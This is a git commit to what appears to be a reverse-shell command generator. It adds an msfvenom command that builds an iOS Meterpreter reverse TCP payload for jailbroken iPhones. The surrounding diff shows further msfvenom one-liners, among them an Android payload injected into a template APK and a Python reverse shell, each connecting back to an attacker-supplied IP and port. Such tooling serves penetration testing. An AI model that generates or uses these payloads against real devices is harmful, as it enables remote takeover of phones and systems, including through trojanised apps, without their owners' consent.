Adding Apple iOS Meterpreter payload

A simple reverse TCP Inline payload that can be run on a jailbroken arm64 iPhone (5S+)
This commit is contained in:
John Jackson 2023-02-04 16:46:08 -07:00 committed by GitHub
parent 9fb7218e53
commit e4aa07eae8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -453,6 +453,11 @@ const msfvenomCommands = withCommandType(
"command": "msfvenom --platform android -x template-app.apk -p android/meterpreter/reverse_tcp lhost={ip} lport={port} -o payload.apk",
"meta": ["msfvenom", "android", "android", "reverse"]
},
{
"name": "Apple iOS Meterpreter Reverse TCP Inline",
"command": "msfvenom -p apple_ios -p apple_ios/aarch64/meterpreter_reverse_tcp lhost={ip} lport={port} -f macho -o payload",
"meta": ["msfvenom", "apple_ios", "apple_ios", "reverse"]
},
{
"name": "Python Stageless Reverse TCP",
"command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw",